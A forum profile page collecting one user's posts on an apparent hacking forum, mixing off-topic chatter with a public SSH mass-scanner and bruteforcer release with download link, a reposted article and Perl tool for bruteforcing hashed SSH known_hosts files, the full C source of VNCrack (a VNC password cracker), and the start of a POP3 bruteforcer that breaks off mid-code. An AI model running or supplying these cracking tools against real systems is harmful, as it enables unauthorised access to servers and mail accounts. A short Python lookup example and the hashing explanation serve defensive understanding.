Eric

Active Members
  • Posts: 539
  • Days Won: 4

Everything posted by Eric

  1. Apart from off-topic, do you know how to do anything else? Looking at your posts, they are all aimless; try to refrain from crap like this, or do you like collecting posts so people will say you're important? Read here and you'll understand: Internet Protocol (IP)
  2. The scanner wasn't written by me and I don't have the source either; it was made "to order". I didn't find anything suspicious!
  3. I decided to make my SSH bruteforcer public. It was finished sometime in December 2013 and it catches very well.

    Advantages:
    1. it filters busybox
    2. everything in bash.txt is a good server
    3. there is session.txt; if the root gets restarted, you can start manually from ssh2
    4. if the root has several interfaces (IPs), they can be put in the interfaces.txt file, one IP per line; this helps scanning because requests are made from several IPs
    5. the pscan is multithreaded, i.e. much faster than the public ones

    How is it used?
    ./scan A
    ./scan B
    ./scan C
    A = A range; e.g.: ./scan 70
    B = B range; e.g.: ./scan 70.8
    C = C range; e.g.: ./scan 70.6.1
    If the server reboots or the scan stops, to restart it run ./ssh2 and read the help.

    download: http://bssh.comule.com/bssh.tgz

    I am not responsible for what you do with the scanner. I don't sell scanners like this. Don't contact me in private.
  4. you forgot to mention the most important thing, the internet subscription, preferably something prepaid. otherwise the whole combination is fucked.
  5. You start at around 800 RON, depending on the casino. First you have to take the croupier course, which costs from 300 euros upwards. I think the ones at Marriott have it for free, but you have to sign with them for at least 1 year.
  6. Eric

    Anyone know?

    why don't you stop with this off-topic? is this the market or what rubbish is this? are we filling 10 pages again with what I'll do to x when I catch him?
  7. Eric

    Vbulletin license

    up, I'm still interested!
  8. OpenSSH is a common tool for most network and system administrators. It is used daily to open remote sessions on hosts to perform administrative tasks. But it is also used to automate tasks between trusted hosts. Based on public/private key pairs, hosts can exchange data or execute commands via a safe (encrypted) pipe. When you ssh to a remote server, your ssh client records the hostname, IP address and public key of the remote server in a flat file called "known_hosts". The next time you start an ssh session, the ssh client compares the server information with the one saved in the "known_hosts" file. If they differ, an error message is displayed. The primary goal of this mechanism is to block MITM ("Man-In-The-Middle") attacks. But this file (stored by default in your "$HOME/.ssh" directory) introduces security risks. If an attacker has access to your home directory, he will have access to the file, which may contain hundreds of hosts to which you also have access. Did you ever hear about the "Island Hopping" attack? Wikipedia defines this attack as follows: "In computer security, for example in intrusion detection and penetration testing, island hopping is the act of entering a secured system through a weak link and then "hopping" around on the computer nodes within the internal systems. In this field, island hopping is also known as pivoting." A potential worm could take advantage of the information stored in the file to spread across multiple hosts. OpenSSH introduced a countermeasure against this attack in version 4.0: the ssh client is able to store the host information in a hashed format.

    The old format was:

    host.rootshell.be,10.0.0.2 ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAQEA0ei6KvTUHnmCjdsEwpCCaOHZWvjS \
    jytm/5/Vv1Dc6ToaxTnqJ7ocBb7NI/HUQEc23eUYjFrZQDS0JRml3RnsG0UzvtIfAPDP1x7h6HHy4ixjAP7slXgqj3c \
    fOV5ThNjYI0mEbIh1ezGWovwoy0IxRK9Lq29CacqQH8407b1jEj/zfOzUi3FgRlsKZTsc3UIoWSY0KPSSPlcSTInviG \
    oNi+9gC8eqXHURsvOWyQMH5K5isvc/Wp1DiMxXSQ+uchBl6AoqSj6FTkRAQ9oAe8p1GekxuLh2PJ+dMDIuhGeZ60fIh \
    eq15kzZGsDWkNF6hc/HmkJDSPn3bRmo3xmFP02sNw==

    With version 4.0, hosts are stored in this new format:

    |1|U8gOHG/S5rH9uRH3cXgdUNF13F4=|cNimv6148Swl6QcwqBOjgRnHnKs= ssh-rsa AAAAB3NzaC1yc2EAAAABIw \
    AAAQEAvAtd04lhxzzqW57464mhkubDixZpy+qxvXBVodNmbM8culkfYtmq0Ynd+1G1s3hcBSEa8XHhNdcxTx51MbIjO \
    dCbFyx6rbvTIU/5T2z0/TMjeQyL3SZttbYWM2U0agKp/86FdaQF6V87loNcDq/26JLBSaZgViZS4gKZbflZCdD6aB2s \
    2sqEV4k7zU2OMHPy7W6ghNQzEu+Ep/44w4RCdI5OYFfids9B0JSUefR9eiumjRwyI0dCPyq9jrQZy47AI7oiQJqSjvu \
    eMIwZrrlmECYSvOru0MiyeKwsm7m8dyzAE+f2CkdUh6tQleLRLnEMH+25EAB56AhkpWSuMPJX1w==

    As you can see, the hostname is not readable anymore. To achieve this result, a new configuration directive was added in version 4.0 and above: "HashKnownHosts [Yes|No]". Note that this feature is not enabled by default. Some Linux (or other UNIX) flavors enable it by default. Check your configuration. If you switch the hashing feature on, do not forget to hash your existing known_hosts file:

    $ ssh-keygen -H -f $HOME/.ssh/known_hosts

    Hashing ssh keys is definitely the right way to go, but it introduces problems. First, the good guys cannot easily manage their SSH hosts! How to perform a cleanup? (My "known_hosts" file has 239 entries!) In case of security incident management or forensics investigations, it can be useful to know the list of hosts to which the user connected. It's also an issue for pentesters. If you have access to a file containing hashed SSH hosts, it can be interesting to discover the hostnames or IP addresses and use the server to "jump" to another target. Remember: people are weak and re-use the same passwords on multiple servers.

    By looking into the OpenSSH client source code (more precisely in "hostfile.c"), I found how the hostnames are hashed. Here is an example:

    |1|U8gOHG/S5rH9uRH3cXgdUNF13F4=|cNimv6148Swl6QcwqBOjgRnHnKs=

    "|1|" is the HASH_MAGIC. The first part between the "|" separators is the salt, encoded in Base64. When a new host is added, the salt is generated randomly. The second one is the hostname HMAC ("Hash-based Message Authentication Code") generated via SHA1 using the decoded salt and then encoded in Base64. Once the hashing is performed, it's not possible to decode it. Like UNIX passwords, the only way to find back a hostname is to apply the same hash function and compare the results.

    I wrote a Perl script to bruteforce the "known_hosts" file. It generates hostnames or IP addresses, hashes them and compares the results with the information stored in the SSH file. The script syntax is:

    ./known_hosts_bruteforcer.pl -h
    Usage: known_hosts_bruteforcer.pl [options]
      -d <domain>   Specify a domain name to append to hostnames (default: none)
      -f <file>     Specify the known_hosts file to bruteforce (default: /.ssh/known_hosts)
      -i            Bruteforce IP addresses (default: hostnames)
      -l <integer>  Specify the hostname maximum length (default: 8)
      -s <string>   Specify an initial IP address or password (default: none)
      -v            Verbose output
      -h            Print this help, then exit

    Without arguments, the script will bruteforce your $HOME/.ssh/known_hosts by generating hostnames with a maximum length of 8 characters. If a match is found, the hostname is displayed with the corresponding line in the file. If your hosts are FQDNs, a domain can be specified using the "-d" flag. It will be automatically appended to all generated hostnames. By using the "-i" flag, the script generates IP addresses instead of hostnames. To spread the load across multiple computers, or if you know the first letters of the hostnames used or the first bytes of the IP addresses, you can specify an initial value with the "-s" flag. Examples: If your server names are based on the template "srvxxx" and belong to the rootshell.be domain, use the following syntax:

    ./known_hosts_bruteforcer.pl -d rootshell.be -s srv000

    If your DMZ uses IP addresses in the range 192.168.0.0/24, use the following syntax:

    ./known_hosts_bruteforcer.pl -i -s 192.168.0.0

    When hosts are found, they are displayed as below:

    $ ./known_hosts_bruteforcer.pl -i -s 10.255.0.0
    *** Found host: 10.255.1.17 (line 31) ***
    *** Found host: 10.255.1.74 (line 165) ***
    *** Found host: 10.255.1.75 (line 69) ***
    *** Found host: 10.255.1.76 (line 28) ***
    *** Found host: 10.255.1.78 (line 56) ***
    *** Found host: 10.255.1.91 (line 51) ***
    ^C

    My first idea was to bruteforce using a dictionary. Unfortunately, hostnames are sometimes based on templates like "svr000" or "dmzsrv-000", which makes a dictionary unreliable. And what about the performance? I'm not a developer and my code could for sure be optimized. The performance is directly related to the size of your "known_hosts" file. Be patient! Usual disclaimer: this code is provided "as is" without any warranty or support. It is provided for educational or personal use only. I'll not be held responsible for any illegal activity performed with this code.

    Download: http://blog.rootshell.be/wp-content/uploads/2010/11/known_hosts_bruteforcer.pl.txt
    Source: Bruteforcing SSH Known_Hosts Files | /dev/random
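The hashed entry format the reposted article describes (a random salt and an HMAC-SHA1 of the hostname keyed with that salt, both Base64-encoded) is easy to reproduce, and the same computation answers the "how to perform a cleanup?" question from the defender's side: you can check whether a given host is in a hashed known_hosts file and drop its entries, which is what ssh-keygen -F and ssh-keygen -R do. The script below is an added example, not code from the article, the forum post or OpenSSH; the known_hosts contents, the key blob and the fixed salts in it are constructed for the demonstration (OpenSSH draws a fresh random salt per entry, as the article says), and the "[host]:port" form for non-default ports is the one OpenSSH itself writes into the file.

```python
"""Look up and prune hosts in an OpenSSH known_hosts file that uses the
hashed (|1|salt|hmac) entry format described in the reposted article.

Added example, not code from the article or from OpenSSH. The sample file,
the key blob and the fixed salts below are constructed for the demonstration.
"""
import base64
import hashlib
import hmac
import os

HASH_MAGIC = "|1|"
SALT_LEN = 20  # OpenSSH uses a random salt as long as a SHA-1 digest


def hash_host(host, salt=None):
    """Build the hashed host field for `host`: |1|b64(salt)|b64(HMAC-SHA1(salt, host))."""
    if salt is None:
        salt = os.urandom(SALT_LEN)
    mac = hmac.new(salt, host.encode(), hashlib.sha1).digest()
    return HASH_MAGIC + base64.b64encode(salt).decode() + "|" + base64.b64encode(mac).decode()


def host_matches(host_field, host):
    """True if a known_hosts host field (hashed or plain) refers to `host`.

    A hashed entry cannot be read back; the only check is to recompute the
    HMAC with the entry's own salt and compare, exactly as the ssh client does.
    """
    if host_field.startswith(HASH_MAGIC):
        try:
            salt_b64, mac_b64 = host_field[len(HASH_MAGIC):].split("|", 1)
            salt = base64.b64decode(salt_b64, validate=True)
            expected = base64.b64decode(mac_b64, validate=True)
        except ValueError:
            return False  # malformed entry: never a match
        actual = hmac.new(salt, host.encode(), hashlib.sha1).digest()
        return hmac.compare_digest(actual, expected)
    # Plain entries may list several names/addresses separated by commas.
    return host in host_field.split(",")


def _host_field(line):
    """Host field of one known_hosts line, or None for blank and comment lines."""
    fields = line.split()
    if not fields or fields[0].startswith("#"):
        return None
    # "@cert-authority" / "@revoked" markers precede the host field.
    return fields[1] if fields[0].startswith("@") and len(fields) > 1 else fields[0]


def find_host(known_hosts_text, host):
    """1-based line numbers of entries for `host` (what `ssh-keygen -F host` reports)."""
    hits = []
    for lineno, line in enumerate(known_hosts_text.splitlines(), 1):
        field = _host_field(line)
        if field is not None and host_matches(field, host):
            hits.append(lineno)
    return hits


def remove_host(known_hosts_text, host):
    """Cleanup: the file contents without any entry for `host` (`ssh-keygen -R host`)."""
    kept = []
    for line in known_hosts_text.splitlines():
        field = _host_field(line)
        if field is not None and host_matches(field, host):
            continue
        kept.append(line)
    return "\n".join(kept)


# Constructed sample file: one readable entry, one hashed entry for the same
# address, and one hashed entry for a non-default port (OpenSSH hashes the
# "[host]:port" string when the port is not 22). The key blob is a placeholder.
_KEY = "ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDplaceholderKeyBlobForTheExampleOnly=="
_SALT_A = bytes(range(SALT_LEN))
_SALT_B = bytes(range(SALT_LEN, 2 * SALT_LEN))
SAMPLE_KNOWN_HOSTS = "\n".join([
    "host.rootshell.be,10.0.0.2 " + _KEY,
    hash_host("10.0.0.2", _SALT_A) + " " + _KEY,
    hash_host("[gw.example.test]:2222", _SALT_B) + " " + _KEY,
])

if __name__ == "__main__":
    for probe in ("10.0.0.2", "host.rootshell.be", "[gw.example.test]:2222", "gw.example.test"):
        print(probe, "->", find_host(SAMPLE_KNOWN_HOSTS, probe))
    print(remove_host(SAMPLE_KNOWN_HOSTS, "10.0.0.2"))
```

Because the salt is per entry, the same address hashes differently on every line, so a lookup has to recompute the HMAC against each entry's own salt; that is also why the article's dictionary approach scales with the size of the file. Note that a host reached on a non-default port only matches under its "[host]:port" spelling, which is easy to overlook when auditing.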
  9. SSHTunnel is an SSH tunnel app for Android, based on ConnectBot and Dropbear / OpenSSH (Beta Branch). With this app and a configured server (typically configured with sshd and nginx / squid), you can easily browse the internet through an SSH tunnel on your Android devices. SSHTunnel uses redsocks (redsocks - transparent socks redirector) to redirect all traffic on Android. You can check out its source code from: https://github.com/darkk/redsocks

    Currently, the latest sshtunnel source code can be found here: https://bitbucket.org/madeye/sshtunnel and the latest sshtunnel-beta can be found here: https://github.com/madeye/sshtunnel-beta

    Notice: If you want to set up your own VPS to work with this app, please install and configure an HTTP PROXY on your VPS first (typically squid or nginx). To support HTTPS (SSL), you must configure your HTTP proxy to allow the CONNECT method on port 443. Considering the poor performance of dynamic port forwarding on most Android devices, we suggest you use a transparent proxy set up on the SSH server and use local port forwarding to proxy data through the SSH tunnel. To work with your private/public key, please store your key (OpenSSH format only, not PuTTY) as the file /sdcard/sshtunnel/key

    IMPORTANT: This app uses a DNS proxy to solve the DNS pollution problem in China, which tries to fetch pre-defined HOSTS information from our web server. All these HOSTS files and source code are open to the public.

    Download: https://code.google.com/p/sshtunnel/downloads/list
  10. try doing wget on a server, then tar xvf on the .jpg archive ....
    @ Cartus_C - congratulations, you made public a scanner from 2007-2008 that is everywhere; it has been posted countless times.
    @ tex - also explain how you got that link, i.e.:
    - copy link location on download
    - wget -O scan.tar url
    It is not mandatory to pass the user agent.
  11. I'm buying a vbulletin license. Awaiting offers and prices. Thanks.
  12. I'll become Hungarian, Eric the Hungarian! I shit on this topic
  13. Eric

    ip check tool

    IP check tool - retrieve information about an ip
  14. It matters a lot how you check those IPs. I recommend maxmind; even the free .dat files are OK for what you need. e.g.: IP check tool - retrieve information about an ip. I've been working on it for a while; the info is taken from the maxmind .dat files, though admittedly the full versions cost something.
  15. 5 more like this and you can post in the market. close!
  16. If you block the rules for x seconds / minutes at registration you still achieve nothing, because they leave them open, come back after x time, then click next. The best way to get them to go through them is to make the rules very clearly available and then make them answer 3 random questions. Such as: How many QUALITY posts do you need in order to post in category X, Y, Z; What do you have to do if ....; What must you not do if ....
  17. Better to give them a link to the rules at registration, then instead of a captcha make them answer 3 questions from the rules; that way you know they've read them.
  18. since when is natural gas extracted from the ground with cyanide? i.e. to extract a gas I pump in cyanide? wasn't that used only for gold? or what's the explanation with cyanide and shale gas? not that I'd agree with others exploiting the gas, but that picture seems way too exaggerated to me. i.e. after the exploitation, if I go visit relatives in the village in question, will I get a blue eye? what superpowers will I gain?
  19. debian, ubuntu, centos... that's about the order. I prefer ubuntu for quick stuff, done with a click and no headaches.
  20. it's strictly educational.
  21. Download vncrack.tar.gz from Sendspace.com - send big files the easy way

    /* Project code: vncrack
     *
     * FX <fx@phenoelit.de>
     * Phenoelit (http://www.phenoelit.de/)
     * (c) 2k
     *
     * Block sleep idea by Stonneway.
     *
     * $Id: vncrack.c,v 1.17 2001/06/23 16:33:41 fx Exp fx $
     */
    #include <stdio.h>
    #include <stdlib.h>     /* malloc(), exit(), atoi(), atol(), strtol(): missing in the posted copy */
    #include <string.h>
    #include <strings.h>    /* bcopy(), bzero() */
    #include <syslog.h>
    #include <sys/types.h>
    #include <sys/socket.h>
    #include <netdb.h>
    #include <netinet/in.h>
    #include <unistd.h>
    #include <sys/time.h>
    #include <time.h>       /* nanosleep(), time() */
    #include <signal.h>
    #include "d3des.h"      /* not on the page; ships in the vncrack.tar.gz archive */

    /* defs out of libvncauth */
    extern unsigned char fixedkey[8];
    int vncEncryptAndStorePasswd(char *passwd, char *fname);
    char *vncDecryptPasswdFromFile(char *fname);
    void vncEncryptBytes(unsigned char *bytes, char *passwd);

    #define SPLASH "VNCrack - by Phenoelit (http://www.phenoelit.de/)\n$Revision: 1.17 $\n"

    int verbose=0, lbf=0;
    char *schallange=NULL, *sresponse=NULL;

    void interactive(void);
    void cr_crack(char *wordlist);

    void *sec_malloc(size_t size)
    {
        void *p;
        if ((p=malloc(size))==NULL) {
            fprintf(stderr,"malloc() failed for %zu bytes\n",size);
            exit(-1);
        }
        memset(p,0,size);
        return p;
    }

    void usage(void)
    {
        printf("VNCrack\n"
               "$Id: vncrack.c,v 1.17 2001/06/23 16:33:41 fx Exp fx $\n"
               "by Phenoelit (http://www.phenoelit.de/)\n\n"
               "Usage:\n"
               "Online: ./vncrack -h target.host.com -w wordlist.txt [-opt's]\n"
               "Passwd: ./vncrack -C /home/some/user/.vnc/passwd\n"
               "Windows interactive mode: ./vncrack -W \n"
               "\tenter hex key one byte per line - find it in\n"
               "\t\\HKEY_CURRENT_USER\\Software\\ORL\\WinVNC3\\Password or\n"
               "\t\\HKEY_USERS\\.DEFAULT\\Software\\ORL\\WinVNC3\\Password\n\n"
               "Options for online mode:\n"
               "-v\tverbose\n"
               "-d N\tSleep N nanoseconds between each try\n"
               "-D N\tSleep N seconds between each try\n"
               "-a\tJust a funny thing\n"
               "-p P\tconnect to port P instead of 5900\n"
               "-s N\tSleep N seconds in case connect() failed\n"
               "Options for PHoss intercepted challages:\n"
               "-c <challange>\tchallange from PHoss output\n"
               "-r <response>\tresponse from PHoss output\n"
              );
        exit(-1);
    }

    int main(int argc, char **argv)
    {
        int sfd;                        /* socket */
        struct hostent *dest;
        struct sockaddr_in dest_addr;
        // char *sbuf;
        char *rbuf;
        unsigned char atype[4];
        unsigned char challange[16];
        char *vnchost=NULL;
        int vncport=5900;
        extern char *optarg;
        int option;
        int i,ani=0;
        char *wordlist=NULL;
        FILE *fd;
        char *tryword;
        struct timespec ts={0,0};
        int conwait=90;
        int redocount=0;
        int redosleep=12;
        char servertext[256];
        char *sthelp;

        while ((option=getopt(argc,argv,"avWp:h:w:C:d:D:s:c:r:R:"))!=EOF) {
            switch (option) {
                case 'v':       /* verbose */
                    verbose++;
                    break;
                case 'a':       /* animation shit */
                    ani=1;
                    break;
                case 'p':       /* port def */
                    if ((vncport=atoi(optarg))==0) {
                        fprintf(stderr,"wrong port number: %s\n",optarg);
                        exit(-1);
                    }
                    break;
                case 'h':       /* hostname */
                    vnchost=(char *)sec_malloc(strlen(optarg)+1);
                    strcpy(vnchost,optarg);
                    break;
                case 'w':       /* wordlist file */
                    wordlist=(char *)sec_malloc(strlen(optarg)+1);
                    strcpy(wordlist,optarg);
                    break;
                case 'd':
                    if ((ts.tv_nsec=atol(optarg))==0) {
                        fprintf(stderr,"Delay of 0 ?\n");
                        exit(-1);
                    }
                    break;
                case 'D':
                    if ((ts.tv_sec=atoi(optarg))==0) {
                        fprintf(stderr,"Delay of 0 ?\n");
                        exit(-1);
                    }
                    break;
                case 's':       /* for the 'cannot assign req. addr' stuff */
                    conwait=atoi(optarg);
                    break;
                case 'C':       /* VNC passwd file */
                    /* if the user just requests file decryption - here we go */
                    printf("VNC password: %s\n", vncDecryptPasswdFromFile(optarg));
                    exit(0);
                    break;      /* not reached */
                case 'W':       /* going interactive */
                    interactive();
                    break;      /* not reached */
                case 'c':       /* challange */
                    schallange=(char *)sec_malloc(strlen(optarg)+1);
                    strcpy(schallange,optarg);
                    break;
                case 'r':       /* response */
                    sresponse=(char *)sec_malloc(strlen(optarg)+1);
                    strcpy(sresponse,optarg);
                    break;
                case 'R':       /* redo sleep */
                    redosleep=atoi(optarg);
                    break;
                default:
                    usage();
            }
        }

        if (verbose) ani=0;

        if (schallange||sresponse) {
            printf(SPLASH);
            cr_crack(wordlist);     /* exit is done here */
        }

        if (!(vnchost&&vncport&&wordlist)) usage();

        printf(SPLASH);

        /* resolve host */
        if ((dest=gethostbyname(vnchost))==NULL) {
            syslog(LOG_ERR,"unable to resolve host %s", vnchost);
            exit(-1);
        }
        dest_addr.sin_family=AF_INET;
        dest_addr.sin_port=htons(vncport);
        bcopy(dest->h_addr,(char *)&dest_addr.sin_addr,dest->h_length);
        bzero(&(dest_addr.sin_zero),8);

        if ((fd=fopen(wordlist,"rt"))==NULL) {
            fprintf(stderr,"Unable to open wordlist %s\n",wordlist);
            exit(-1);
        }

        tryword=sec_malloc(256);
        while (fgets(tryword,255,fd)!=NULL) {
            /* cut the word */
            /* if (strlen(tryword)>8) tryword[8]='\0'; */
            if (tryword[strlen(tryword)-1]=='\n') tryword[strlen(tryword)-1]='\0';

    ReDoClosed:
            if (verbose) {
                printf("trying '%s' ...",tryword);
                fflush(stdout);
            }

            /* socket() returns -1 on failure; the posted copy tested for ==0 */
            if ((sfd=socket(AF_INET,SOCK_STREAM,0))<0) {
                perror("socket()");
                fprintf(stderr,"Sleeping for %d seconds before retry...\n",conwait);
                sleep(conwait);
                if ((sfd=socket(AF_INET,SOCK_STREAM,0))<0) {
                    perror("socket()");
                    fprintf(stderr,"Giving up!\n");
                    exit(-1);
                }
            }
            if (connect(sfd,(struct sockaddr *)&dest_addr,sizeof(dest_addr))<0) {
                perror("connect()");
                fprintf(stderr,"Sleeping for %d seconds before retry...\n",conwait);
                close(sfd);
                sleep(conwait);
                if ((sfd=socket(AF_INET,SOCK_STREAM,0))<0) {
                    perror("socket()");
                    exit(-1);
                }
                if (connect(sfd,(struct sockaddr *)&dest_addr,sizeof(dest_addr))<0) {
                    perror("connect()");
                    fprintf(stderr,"Giving up!\n");
                    exit(-1);
                }
            }

            /* communication starts with server->client version packet */
            rbuf=sec_malloc(100);
            if (recv(sfd,rbuf,100,0)<0) {
                perror("recv()");
                exit(-1);
            }
            if (verbose>1) printf("\nServer Protocol version: %s\n",rbuf);
            /* bounce this message back - so the server will continue */
            if (send(sfd,rbuf,strlen(rbuf),0)<0) {
                perror("send()");
                exit(-1);
            }
            if (recv(sfd,atype,sizeof(atype),0)<0) {
                perror("atype recv()");
                exit(-1);
            }
            if (verbose>1) {
                printf("Authentication type: ");
                for (i=0;i<4;i++) {
                    printf("%x ",atype[i]);
                }
                printf("\n");
            }

            switch (atype[3]) {
                case 0:
                    fprintf(stderr,"Server told me: connection close\n");
                    /* get more info */
                    if (verbose) {
                        memset(servertext,0,sizeof(servertext));
                        if (recv(sfd,servertext,sizeof(servertext),0)<0) {
                            fprintf(stderr,"recv() in verbose");
                            exit(-1);
                        } else {
                            sthelp=(char *)servertext;
                            sthelp+=4;
                            fprintf(stderr,"Server says: %s\n",sthelp);
                        }
                        printf("\tWaiting for blocking disable\n");
                    }
                    sleep(redosleep);
                    if ((redocount++)<3) {
                        goto ReDoClosed;
                    } else {
                        fprintf(stderr,"\tgiving up (increase -R)\n");
                    }
                    exit(-1);
                    break;      /* not reached */
                case 1:
                    printf("\n>>>>>>>>>>>>>>>\n"
                           "Server does not require authentication!\n"
                           ">>>>>>>>>>>>>>>\n");
                    exit(-1);
                    break;      /* not reached */
                case 2:
                    if (verbose>1) printf("Authentication type "
                                          "'VNC authentication' - fine\n");
                    break;
                default:
                    fprintf(stderr,"Unknown authentication requested"
                                   "by server\n");
                    exit(-1);
            }
            redocount=0;

            if (recv(sfd,challange,sizeof(challange),0)<0) {
                perror("challange recv()");
                exit(-1);
            }
            if (verbose>1) {
                printf("challange: ");
                for (i=0;i<16;i++) {
                    printf("%x ",challange[i]);
                }
                printf("\n");
            }

            /* encrypt challange with password and send this fuck to the server */
            vncEncryptBytes(challange,tryword);
            if (send(sfd,challange,sizeof(challange),0)<0) {
                perror("authentication send()");
                exit(-1);
            }

            atype[3]=0;
            if (recv(sfd,atype,sizeof(atype),0)<0) {
                perror("auth response recv()");
                exit(-1);
            }
            switch (atype[3]) {
                case 0:
                    printf("\n>>>>>>>>>>>>>>>\n"
                           "Password: %s\n"
                           ">>>>>>>>>>>>>>>\n",tryword);
                    free(tryword);
                    exit(0);
                    break;      /* not reached */
                case 1:         /* 'normal' failed */
                    if (verbose) printf("failed\n");
                    break;
                case 2:         /* too many */
                    printf("Server is angry, waiting 2 minutes "
                           "for calm down...\n");
                    sleep(120);
                    break;
                default:
                    fprintf(stderr,"Unknown response\n");
                    exit(-1);
            }

            shutdown(sfd,2);
            close(sfd);
            memset(tryword,0,256);

            if (ani) {
                switch (ani) {
                    case 1: printf("\b|"); break;
                    case 2: printf("\b/"); break;
                    case 3: printf("\b-"); break;
                    case 4: printf("\b\\"); ani=0; break;
                }
                ani++;
                fflush(stdout);
            }

            if (ts.tv_nsec||ts.tv_sec) {
                nanosleep(&ts,NULL);
            }
        }
        free(tryword);
        fclose(fd);
        return 0;
    }

    void interactive(void)
    {
        unsigned char *pass;
        int i;
        unsigned int c;     /* scanf("%x") stores an unsigned int; the posted copy read into a char */

        pass=(unsigned char *)sec_malloc(9);
        for (i=0;i<8;i++) {
            scanf("%x",&c);
            pass[i]=(unsigned char)c;
        }
        printf("Entered HEX String: ");
        for (i=0;i<8;i++) {
            printf("%x ",pass[i]);
        }
        printf("\n");
        deskey(fixedkey,DE1);
        des(pass,pass);
        printf("VNC Password: %s\n",pass);
        exit(0);
    }

    void cr_crack(char *wordlist)
    {
        int i,j,depth;
    #define CRL 16
        char chl[CRL+1];
        char rsp[CRL+1];
        char tchl[CRL+1];
        char ts[3];
        FILE *fd;
        char *tryword;
        char bft[9];
        /* char cset1[] = "abcdefghijklmnopqrstuvwxyz"
                          "ABCDEFGHIJKLMNOPQRSTUVWXYZ"
                          "1234567890\0"; */
        char cset1[] = "abcdefghijklmnopqrstuvwxyz"
                       "ABCDEFGHIJKLMNOPQRSTUVWXYZ"
                       "1234567890!\"$%&/()=?`''*_:;-.,#+}][{^<>¦\0";
    #define cset1_len (92)  /* 92 bytes in the Latin-1 original, where the trailing '¦' is a single byte */
        int cnt[8];
        time_t t1,t2;
        static const char *roman[]={"I","II","III","IV","V","VI","VII","VIII"};

        if ((!schallange)||(!sresponse)) {
            usage();
        }
        if ( (strlen(schallange)!=16*2) || (strlen(sresponse)!=16*2) ) {
            fprintf(stderr,"challange and response have to be 32 characters each\n");
            exit(-1);
        }

        memset(&chl,0,CRL+1);
        memset(&tchl,0,CRL+1);
        memset(&rsp,0,CRL+1);
        memset(&ts,0,3);
        j=0;
        for (i=0;i<CRL;i++) {
            strncpy(ts,&schallange[j],2);
            chl[i]=(unsigned char)strtol(ts,NULL,16);
            strncpy(ts,&sresponse[j],2);
            rsp[i]=(unsigned char)strtol(ts,NULL,16);
            j+=2;
        }

        if (verbose) {
            printf("Challange: ");
            for (i=0;i<CRL;i++) { printf("%x",(unsigned char) chl[i]); }
            printf("\n");
            printf("Response : ");
            for (i=0;i<CRL;i++) { printf("%x",(unsigned char) rsp[i]); }
            printf("\n");
        }

        if ((fd=fopen(wordlist,"rt"))==NULL) {
            fprintf(stderr,"Could not open wordlist\n");
            exit(-1);
        }
        tryword=sec_malloc(256);
        while (fgets(tryword,255,fd)!=NULL) {
            tryword[strlen(tryword)-1]='\0';
            /* try this word */
            memcpy(tchl,chl,CRL);
            vncEncryptBytes((unsigned char *)tchl,tryword);
            if (verbose>1) {
                for (i=0;i<CRL;i++) { printf("%x",(unsigned char) rsp[i]); }
                printf("\n");
                for (i=0;i<CRL;i++) { printf("%x",(unsigned char) tchl[i]); }
                printf("\n");
            }
            if (!memcmp(tchl,rsp,CRL)) {
                printf("\n>>>>>>>>>>>>>>>\n"
                       "Password: %s\n"
                       ">>>>>>>>>>>>>>>\n",tryword);
                free(tryword);
                exit(0);
            } else {
                if (verbose) printf("%s failed\n",tryword);
            }
            memset(tryword,0,256);
        }
        fclose(fd);
        free(tryword);

        printf("-----------------------------------\n"
               "Wordlist failed - going brute force\n"
               "-----------------------------------\n");

        /* Brute force over cset1 one character position at a time (depth I ..
           depth VIII). The posted listing unrolls this into eight hand-written
           sets of nested loops; the odometer below tries the same candidates in
           the same order (position 0 changes fastest). */
        bft[8]='\0';
        t1=time(NULL);      /* the posted copy never set t1 before using it below */
        for (depth=1;depth<=8;depth++) {
            printf("\tdepth %s\n",roman[depth-1]);
            bft[depth]='\0';
            memset(cnt,0,sizeof(cnt));
            for (;;) {
                for (i=0;i<depth;i++) bft[i]=cset1[cnt[i]];
                if (verbose) printf("try: %s\n",bft);
                memcpy(tchl,chl,CRL);
                vncEncryptBytes((unsigned char *)tchl,bft);
                if (!memcmp(tchl,rsp,16)) {
                    printf("\n>>>>>>>>>>>>>>>\n"
                           "Password: %s\n"
                           ">>>>>>>>>>>>>>>\n", bft);
                    exit(0);
                }
                /* advance the odometer; carry into the next position on wrap */
                for (i=0;i<depth;i++) {
                    if (++cnt[i]<cset1_len) break;
                    cnt[i]=0;
                }
                if (i==depth) break;    /* every position wrapped: this depth is exhausted */
            }
        }
        t2=time(NULL);
        printf("depth VIII (%20.4f wps)\n",(double)(t2-t1)/63);
        printf("Not in character set !\n");
        exit(0);
    }
  22. [C] rstforums.com - pop3 bruteforce - Pastebin.com

    /*
     * popcrack, POP3 bruteforce cracker
     *
     * If you don't want to waste any clock ticks, compile with -DNOBENCHMARK
     * On Windows compile with -DWINDOWS (migh only work with Cygnus Cygwin)
     * To see what is being sent/received, compile with -DDEBUG
     *
     * Usage: popcrack <wordlist> <username> <host> [port]
     *
     * Current benchmarks (quickest speeds attained):
     *   p250 MMX with cable modem: 2000 passwords/min
     *   dual p100 on T3:           1325 passwords/min
     *   p133 at < 21k:              250 passwords/min
     *
     * [both network speed and processor speed play equal roles]
     * [also compiling with -DNOBENCHMARK should improve speed]
     */
    #include <stdio.h>
    #include <stdlib.h>     /* exit(), atoi(): missing in the posted copy */
    #include <errno.h>
    #include <string.h>
    #ifndef WINDOWS
    # include <unistd.h>
    # include <netdb.h>
    #endif
    #ifndef NOBENCHMARK
    # include <time.h>
    # include <signal.h>
    #endif
    #ifdef WINDOWS
    # include <windows.h>
    # include <winsock.h>
    #else
    # include <netinet/in.h>
    # include <sys/socket.h>
    # include <arpa/inet.h>
    #endif

    /* ---------------------------------------------- */
    #ifndef WINDOWS
    # define SOCKET_ERROR   -1
    # define INVALID_SOCKET -1
    # define closesocket(sock) close(sock)
    # define WSACleanup() ;
    #endif

    /* ---------------------------------------------- */
    #define NUMSOCKS    1
    #define PORT        110
    #define ERRORLOG    "error.log"
    #define SUCCESSLOG  "success.log"
    #define COMPLETELOG "complete.log"
    #define PASSLEN     16
    #define BUFSIZE     128

    /* ---------------------------------------------- */
    #ifndef WINDOWS
    typedef int SOCKET;
    typedef struct sockaddr SOCKADDR;
    typedef struct sockaddr_in SOCKADDR_IN;
    #endif

    double numkeys = 0;

    #ifndef NOBENCHMARK
    double minkeys;
    #ifdef WINDOWS
    unsigned int alarm(unsigned int);
    #endif
    void calckeys(int sig) { minkeys = numkeys; }
    #endif

    int main(int argc, char **argv)
    {
    #ifdef WINDOWS
